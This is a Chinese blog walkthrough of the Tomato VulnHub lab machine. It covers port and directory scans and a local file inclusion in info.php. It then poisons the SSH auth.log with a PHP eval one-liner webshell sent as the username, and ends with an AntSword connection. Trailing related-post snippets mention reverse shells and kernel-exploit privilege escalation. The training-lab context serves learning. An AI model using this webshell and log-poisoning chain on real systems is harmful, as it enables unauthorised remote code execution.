Tomato靶机通关攻略

于 2024-09-04 14:42:33 发布
阅读量124 收藏
点赞数 4
文章标签: 经验分享 数据库 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/141892030
版权

1.扫描端口

nmap -A -p- 172.16.1.113

2.敏感目录扫描

dirb http://172.16.1.113/

3.访问敏感目录

http://172.16.1.113/antibot_image/

4.在antibots目录下找到一个info.php文件

5.访问info.php

允许远程读取URL文件,但是不允许包含URL文件,可以进行利用

6.查看源码,提示可以传参,存在文件包含漏洞。

7.页面通过image传参查看passwd文件

8.页面通过image传参查看日志文件

该文件还记录了ssh登录的登录日志

9.将一句话木马作为ssh登录的用户名登录

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

10.蚁剑连接

URL地址:http://192.168.192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log

密码:cmd

2407-2 shw
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【愚公系列】2023年06月 网络安全高级班 101.CTF黑客比赛(Tomato靶机
时光隧道
06-05 4328
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。Tomatosecurity官网提供了Tomato靶机的下载和使用说明。
靶场通关 | Tomato靶机通关秘籍~
鱼溯的博客
10-20 1108
靶场通关 | Tomato靶机通关秘籍~
靶机通关|tomato通关攻略
a96482的博客
07-30 156
发现该文件还记录了ssh登录的登录日志,无论登录成功与否都有记录,那么我们是否也可以使用这个机制写入一句一句话木马。tomato靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/在URL后面输入?image=/etc/passwd (用image参数传入想要获取的文件路径)发现一个antibot_image文件,访问antibot_image。查看info.php的网页源码,发现存在文件包含漏洞。发现只有一个目录,去扫描端口。御剑无字典大小限制版。
tomato靶机打靶过程及思路
qq_52610024的博客
05-30 447
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成。3.发现info.php提示文件包含,读取到/var/log/auth.log,可以用ssh登录传入一句话木马,2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径。用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息。-i&32>&3);1.常规端口及服务发现。...
靶机实战系列之Tomato靶机,2024年最新oppo鸿蒙面试
2401_84159966的博客
04-18 939
linux-exploit-suggester可以用来枚举内核漏洞。发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机。远程文件包含功能通过info.php发现已经关闭。发现存在ubuntu系统默认写入身份认证文件路径。尝试登录 ssh操作后会写入身份认证日志文件。同样的在日志文件中确实发现了存在相关记录。本地文件包含发现账号tomcat。image参数 存在 文件包含。1.4 源码分析+文件包含。1.6 反弹shell。1.7 内核漏洞枚举。
tomato靶机渗透测试
weixin_49340699的博客
07-28 1379
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1550
小白学渗透
tomato打印服务共享教程
06-01
tomato打印服务共享教程 本教程旨在指导用户如何配置tomato打印服务共享,实现打印机的网络共享。整个过程可以分为五个步骤:配置服务器、启动打印服务功能;有线接入主路由配置;无线连接主路由配置;电脑添加网络...
网络安全面试经验分享:蘑菇街/网络安全
persist213的博客
08-27 2040
网安面试指南》
mysql-day02
m0_64370841的博客
08-29 2261
【代码】mysql-day02。
Redis基础命令和事务,redis持久化和主从复制
baomingshu的博客
08-31 1762
nosql数据库介绍:解释为 non-relational(非关系型数据库)。在NoSQL 数据库中数据之间是无联系的数据的结构是松散的,可变的。优势:大数据量,高性能,灵活的数据模型,高可用,低成本劣势:(1)无关系,数据之间是无联系的。
数据库管理-第236期 数据库一体机的价值(20240829)
yhw1809的博客
08-29 1796
数据库一体机是硬件、操作系统和数据库之间的融合,利用更少的硬件实现小体积的高性能密度。
编译原理简介
m0_52796585的博客
09-01 993
编译原理是计算机科学中的一个核心领域,它涉及到将高级编程语言编写的源代码转换成机器语言的过程。这个过程对于计算机程序的运行至关重要,因为计算机硬件只能理解机器语言指令。编译原理不仅关注编译器的设计和实现,还涉及语言的语义、语法分析、代码优化等多个方面。
您应该使用哪个矢量数据库? 选择最适合您需求的数据库
weixin_41446370的博客
09-01 1358
在现实世界中,并非所有数据都能整齐地排列成行和列。在处理复杂的非结构化数据(如图像、视频和自然语言)时尤其如此。矢量数据库是一种以高维矢量形式存储数据的数据库,本质上是代表对象特征或特性的数字列表。每个矢量对应一个独特的实体,如一段文本、图像或视频。但为什么要使用矢量呢?奥妙就在于它能够捕捉语义和相似性。通过将数据表示为向量,我们可以对它们进行数学比较,并确定它们的相似或不相似程度。这使我们能够执行复杂的查询,如 "为我查找与此相似的图片 "或 “检索与此文本语义相关的文档”。
在Postgresql中计算工单的对应的GPS轨迹距离
专注GIS软件开发。
08-30 770
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
mongodb在Java中条件分组聚合查询并且分页(时间戳,按日期分组,年月日...)
最新发布
简单发点工作中用到的,或者记录下小知识点
09-03 1231
按时间 年月日条件分组,筛选数据,统计数据,聚合查询 打印出mongo的SQL语句
SpringBoot项目初始化搭建
weixin_63405049的博客
08-30 1870
本章主要讲解了SpringBoot项目初始化搭建,编程事务的使用,分页依赖的使用,以及跨域问题如何解决,解决了轻量级项目构建初期遇到的一些问题,提供于前后端交互时产生的问题进行分析与解决
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值